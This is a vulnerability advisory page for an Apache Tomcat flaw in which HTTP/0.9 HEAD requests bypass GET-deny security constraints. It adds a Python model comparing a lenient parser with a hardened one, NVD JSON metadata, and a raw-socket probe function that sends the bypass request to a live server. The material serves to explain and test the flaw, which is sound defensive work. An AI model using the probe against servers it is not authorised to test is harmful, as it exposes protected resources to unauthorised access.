FKIE_CVE-2026-24733

Vulnerability from fkie_nvd - Published: 2026-02-17 19:21 - Updated: 2026-02-18 17:51
Summary
Improper Input Validation vulnerability in Apache Tomcat. Tomcat did not limit HTTP/0.9 requests to the GET method. If a security constraint was configured to allow HEAD requests to a URI but deny GET requests, the user could bypass that constraint on GET requests by sending a (specification invalid) HEAD request using HTTP/0.9. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0.M1 through 9.0.112. Older, EOL versions are also affected. Users are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fixes the issue.
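The mechanism behind this advisory is worth seeing in code. HTTP/0.9 has no version token and only one method: the entire request is "GET /path" followed by CRLF, and the response is the raw body with no status line or headers. A server that accepts any two-token request line as HTTP/0.9 without checking the method will evaluate a per-method security constraint against "HEAD" while still returning the body the way an 0.9 GET would, which is how a HEAD-allowed, GET-denied constraint ends up disclosing the resource. The following is an added example written for this page, not Tomcat's code or its real constraint model: it puts a lenient request-line parser (the behaviour the advisory describes) beside a hardened one that enforces GET for HTTP/0.9, drives both through a toy constraint that permits HEAD and denies GET on an assumed path /secret, and includes a raw-socket probe plus a response classifier for checking a test server you are authorised to test. The constraint table, resource content and probe path are constructed for illustration.

```python
"""Added example (not Apache Tomcat code): HTTP/0.9 method check bypass model."""
from dataclasses import dataclass
import socket


@dataclass(frozen=True)
class RequestLine:
    method: str
    target: str
    version: str  # "HTTP/0.9" when the request line carries no version token


def parse_request_line(line: bytes, enforce_09_get: bool) -> RequestLine:
    """Parse a raw request line.

    enforce_09_get=False reproduces the lenient behaviour the advisory
    describes: a two-token line is treated as HTTP/0.9 whatever the method.
    enforce_09_get=True is the hardened rule: an HTTP/0.9 request must be GET.
    """
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) == 3:
        method, target, version = (p.decode("ascii") for p in parts)
        if not version.startswith("HTTP/1."):
            raise ValueError(f"unsupported version {version!r}")
        return RequestLine(method, target, version)
    if len(parts) == 2:
        method, target = (p.decode("ascii") for p in parts)
        if enforce_09_get and method != "GET":
            raise ValueError("HTTP/0.9 request line with non-GET method")
        return RequestLine(method, target, "HTTP/0.9")
    raise ValueError("malformed request line")


# Constructed configuration mirroring the advisory: HEAD is permitted on
# /secret, GET is denied. This is an illustrative model, not Tomcat's
# security-constraint data model.
CONSTRAINTS = {"/secret": {"GET"}}  # url pattern -> methods denied to everyone
RESOURCES = {"/secret": b"top secret body\n"}  # constructed resource content


def constraint_allows(req: RequestLine) -> bool:
    """Per-method constraint check, evaluated on the parsed method only."""
    return req.method not in CONSTRAINTS.get(req.target, set())


def handle(raw_line: bytes, enforce_09_get: bool) -> bytes:
    """Return the bytes a minimal server would write for one request line."""
    try:
        req = parse_request_line(raw_line, enforce_09_get)
    except ValueError:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    if not constraint_allows(req):
        return b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"
    body = RESOURCES.get(req.target, b"")
    if req.version == "HTTP/0.9":
        # HTTP/0.9 responses are the body alone: no status line, no headers.
        # Nothing distinguishes a "HEAD" response from a GET one here, so the
        # lenient parse hands the attacker the GET body.
        return body
    head = b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n" % len(body)
    return head if req.method == "HEAD" else head + body


def build_probe(path: str) -> bytes:
    """The specification-invalid request line the advisory describes."""
    return f"HEAD {path}\r\n".encode("ascii")


def looks_like_09_body(response: bytes) -> bool:
    """A HEAD probe that comes back without a status line returned a raw body."""
    return len(response) > 0 and not response.startswith(b"HTTP/")


def probe(host: str, port: int, path: str, timeout: float = 5.0) -> bytes:
    """Send the probe to a live server (only against systems you own)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(path))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    for label, flag in (("lenient", False), ("hardened", True)):
        print(label, handle(b"HEAD /secret\r\n", flag))
```

Running the module shows the lenient parser returning the constructed /secret body for "HEAD /secret" while the hardened one answers 400; a GET to the same path is refused by both because the constraint denies it directly. When probing a real server, a non-empty response to build_probe() that does not start with "HTTP/" is the symptom to record.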

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Improper Input Validation vulnerability in Apache Tomcat.\n\nTomcat did not limit HTTP/0.9 requests to the GET method. If a security constraint was configured to allow HEAD requests to a URI but deny GET requests, the user could bypass that constraint on GET requests by sending a (specification invalid) HEAD request using HTTP/0.9.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0.M1 through 9.0.112.\n\nOlder, EOL versions are also affected.\n\nUsers are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fixes the issue."
    }
  ],
  "id": "CVE-2026-24733",
  "lastModified": "2026-02-18T17:51:53.510",
  "metrics": {},
  "published": "2026-02-17T19:21:56.820",
  "references": [
    {
      "source": "security@apache.org",
      "url": "https://lists.apache.org/thread/6xk3t65qpn1myp618krtfotbjn1qt90f"
    }
  ],
  "sourceIdentifier": "security@apache.org",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "security@apache.org",
      "type": "Primary"
    }
  ]
}

